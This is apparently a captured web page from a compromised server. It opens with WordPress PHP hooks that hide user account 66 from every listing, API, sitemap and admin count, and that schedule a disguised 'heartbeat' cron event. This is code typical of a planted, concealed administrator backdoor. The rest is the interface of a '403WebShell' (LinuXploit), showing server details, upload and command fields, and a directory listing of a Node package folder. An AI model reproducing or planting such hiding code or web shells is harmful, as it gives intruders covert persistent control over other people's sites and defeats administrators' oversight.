add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/html/jungly/node_modules/async/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
February 13 2026 18:52:37
www-data / www-data
0755
dist
--
February 05 2026 19:13:08
www-data / www-data
0755
internal
--
February 05 2026 19:13:08
www-data / www-data
0755
CHANGELOG.md
28.652 KB
February 05 2026 19:13:08
www-data / www-data
0664
LICENSE
1.038 KB
February 05 2026 19:13:06
www-data / www-data
0664
README.md
2.477 KB
February 05 2026 19:13:08
www-data / www-data
0664
all.js
1.641 KB
February 05 2026 19:13:06
www-data / www-data
0664
allLimit.js
1.509 KB
February 05 2026 19:13:06
www-data / www-data
0664
allSeries.js
1.245 KB
February 05 2026 19:13:06
www-data / www-data
0664
any.js
1.717 KB
February 05 2026 19:13:06
www-data / www-data
0664
anyLimit.js
1.555 KB
February 05 2026 19:13:06
www-data / www-data
0664
anySeries.js
1.283 KB
February 05 2026 19:13:06
www-data / www-data
0664
apply.js
1.8 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyEach.js
1.737 KB
February 05 2026 19:13:06
www-data / www-data
0664
applyEachSeries.js
1.255 KB
February 05 2026 19:13:06
www-data / www-data
0664
asyncify.js
3.418 KB
February 05 2026 19:13:06
www-data / www-data
0664
auto.js
9.613 KB
February 05 2026 19:13:06
www-data / www-data
0664
autoInject.js
6.329 KB
February 05 2026 19:13:07
www-data / www-data
0664
bower.json
0.239 KB
February 05 2026 19:13:08
www-data / www-data
0664
cargo.js
4.542 KB
February 05 2026 19:13:07
www-data / www-data
0664
compose.js
1.524 KB
February 05 2026 19:13:07
www-data / www-data
0664
concat.js
1.551 KB
February 05 2026 19:13:07
www-data / www-data
0664
concatLimit.js
2.111 KB
February 05 2026 19:13:07
www-data / www-data
0664
concatSeries.js
1.242 KB
February 05 2026 19:13:07
www-data / www-data
0664
constant.js
1.719 KB
February 05 2026 19:13:07
www-data / www-data
0664
detect.js
2.156 KB
February 05 2026 19:13:07
www-data / www-data
0664
detectLimit.js
1.719 KB
February 05 2026 19:13:07
www-data / www-data
0664
detectSeries.js
1.321 KB
February 05 2026 19:13:07
www-data / www-data
0664
dir.js
1.264 KB
February 05 2026 19:13:07
www-data / www-data
0664
doDuring.js
2.132 KB
February 05 2026 19:13:07
www-data / www-data
0664
doUntil.js
1.342 KB
February 05 2026 19:13:07
www-data / www-data
0664
doWhilst.js
2.016 KB
February 05 2026 19:13:07
www-data / www-data
0664
during.js
2.149 KB
February 05 2026 19:13:07
www-data / www-data
0664
each.js
2.77 KB
February 05 2026 19:13:07
www-data / www-data
0664
eachLimit.js
1.531 KB
February 05 2026 19:13:07
www-data / www-data
0664
eachOf.js
3.289 KB
February 05 2026 19:13:07
www-data / www-data
0664
eachOfLimit.js
1.385 KB
February 05 2026 19:13:07
www-data / www-data
0664
eachOfSeries.js
1.11 KB
February 05 2026 19:13:07
www-data / www-data
0664
eachSeries.js
1.178 KB
February 05 2026 19:13:07
www-data / www-data
0664
ensureAsync.js
2.456 KB
February 05 2026 19:13:07
www-data / www-data
0664
every.js
1.641 KB
February 05 2026 19:13:07
www-data / www-data
0664
everyLimit.js
1.509 KB
February 05 2026 19:13:07
www-data / www-data
0664
everySeries.js
1.245 KB
February 05 2026 19:13:07
www-data / www-data
0664
filter.js
1.488 KB
February 05 2026 19:13:07
www-data / www-data
0664
filterLimit.js
1.313 KB
February 05 2026 19:13:07
www-data / www-data
0664
filterSeries.js
1.207 KB
February 05 2026 19:13:07
www-data / www-data
0664
find.js
2.156 KB
February 05 2026 19:13:07
www-data / www-data
0664
findLimit.js
1.719 KB
February 05 2026 19:13:07
www-data / www-data
0664
findSeries.js
1.321 KB
February 05 2026 19:13:07
www-data / www-data
0664
foldl.js
2.613 KB
February 05 2026 19:13:07
www-data / www-data
0664
foldr.js
1.5 KB
February 05 2026 19:13:07
www-data / www-data
0664
forEach.js
2.77 KB
February 05 2026 19:13:07
www-data / www-data
0664
forEachLimit.js
1.531 KB
February 05 2026 19:13:07
www-data / www-data
0664
forEachOf.js
3.289 KB
February 05 2026 19:13:07
www-data / www-data
0664
forEachOfLimit.js
1.385 KB
February 05 2026 19:13:07
www-data / www-data
0664
forEachOfSeries.js
1.11 KB
February 05 2026 19:13:07
www-data / www-data
0664
forEachSeries.js
1.178 KB
February 05 2026 19:13:07
www-data / www-data
0664
forever.js
1.896 KB
February 05 2026 19:13:07
www-data / www-data
0664
groupBy.js
2.081 KB
February 05 2026 19:13:07
www-data / www-data
0664
groupByLimit.js
2.323 KB
February 05 2026 19:13:07
www-data / www-data
0664
groupBySeries.js
1.315 KB
February 05 2026 19:13:07
www-data / www-data
0664
index.js
19.046 KB
February 05 2026 19:13:08
www-data / www-data
0664
inject.js
2.613 KB
February 05 2026 19:13:08
www-data / www-data
0664
log.js
1.166 KB
February 05 2026 19:13:08
www-data / www-data
0664
map.js
2.032 KB
February 05 2026 19:13:08
www-data / www-data
0664
mapLimit.js
1.283 KB
February 05 2026 19:13:08
www-data / www-data
0664
mapSeries.js
1.181 KB
February 05 2026 19:13:08
www-data / www-data
0664
mapValues.js
2.188 KB
February 05 2026 19:13:08
www-data / www-data
0664
mapValuesLimit.js
1.989 KB
February 05 2026 19:13:08
www-data / www-data
0664
mapValuesSeries.js
1.297 KB
February 05 2026 19:13:08
www-data / www-data
0664
memoize.js
3.156 KB
February 05 2026 19:13:08
www-data / www-data
0664
nextTick.js
1.413 KB
February 05 2026 19:13:08
www-data / www-data
0664
package.json
2.355 KB
February 05 2026 19:13:08
www-data / www-data
0664
parallel.js
3.027 KB
February 05 2026 19:13:08
www-data / www-data
0664
parallelLimit.js
1.389 KB
February 05 2026 19:13:08
www-data / www-data
0664
priorityQueue.js
3.031 KB
February 05 2026 19:13:08
www-data / www-data
0664
queue.js
5.718 KB
February 05 2026 19:13:08
www-data / www-data
0664
race.js
2.111 KB
February 05 2026 19:13:08
www-data / www-data
0664
reduce.js
2.613 KB
February 05 2026 19:13:08
www-data / www-data
0664
reduceRight.js
1.5 KB
February 05 2026 19:13:08
www-data / www-data
0664
reflect.js
2.323 KB
February 05 2026 19:13:08
www-data / www-data
0664
reflectAll.js
2.729 KB
February 05 2026 19:13:08
www-data / www-data
0664
reject.js
1.414 KB
February 05 2026 19:13:08
www-data / www-data
0664
rejectLimit.js
1.236 KB
February 05 2026 19:13:08
www-data / www-data
0664
rejectSeries.js
1.131 KB
February 05 2026 19:13:08
www-data / www-data
0664
retry.js
5.308 KB
February 05 2026 19:13:08
www-data / www-data
0664
retryable.js
1.978 KB
February 05 2026 19:13:08
www-data / www-data
0664
select.js
1.488 KB
February 05 2026 19:13:08
www-data / www-data
0664
selectLimit.js
1.313 KB
February 05 2026 19:13:08
www-data / www-data
0664
selectSeries.js
1.207 KB
February 05 2026 19:13:08
www-data / www-data
0664
seq.js
2.916 KB
February 05 2026 19:13:08
www-data / www-data
0664
series.js
2.868 KB
February 05 2026 19:13:08
www-data / www-data
0664
setImmediate.js
1.356 KB
February 05 2026 19:13:08
www-data / www-data
0664
some.js
1.717 KB
February 05 2026 19:13:08
www-data / www-data
0664
someLimit.js
1.555 KB
February 05 2026 19:13:08
www-data / www-data
0664
someSeries.js
1.283 KB
February 05 2026 19:13:08
www-data / www-data
0664
sortBy.js
2.763 KB
February 05 2026 19:13:08
www-data / www-data
0664
timeout.js
2.711 KB
February 05 2026 19:13:08
www-data / www-data
0664
times.js
1.425 KB
February 05 2026 19:13:08
www-data / www-data
0664
timesLimit.js
1.36 KB
February 05 2026 19:13:08
www-data / www-data
0664
timesSeries.js
0.997 KB
February 05 2026 19:13:08
www-data / www-data
0664
transform.js
2.651 KB
February 05 2026 19:13:08
www-data / www-data
0664
tryEach.js
2.5 KB
February 05 2026 19:13:08
www-data / www-data
0664
unmemoize.js
0.665 KB
February 05 2026 19:13:08
www-data / www-data
0664
until.js
1.412 KB
February 05 2026 19:13:08
www-data / www-data
0664
waterfall.js
3.265 KB
February 05 2026 19:13:08
www-data / www-data
0664
whilst.js
2.14 KB
February 05 2026 19:13:08
www-data / www-data
0664
wrapSync.js
3.418 KB
February 05 2026 19:13:08
www-data / www-data
0664

Youez - 2016 - github.com/yon3zu
LinuXploit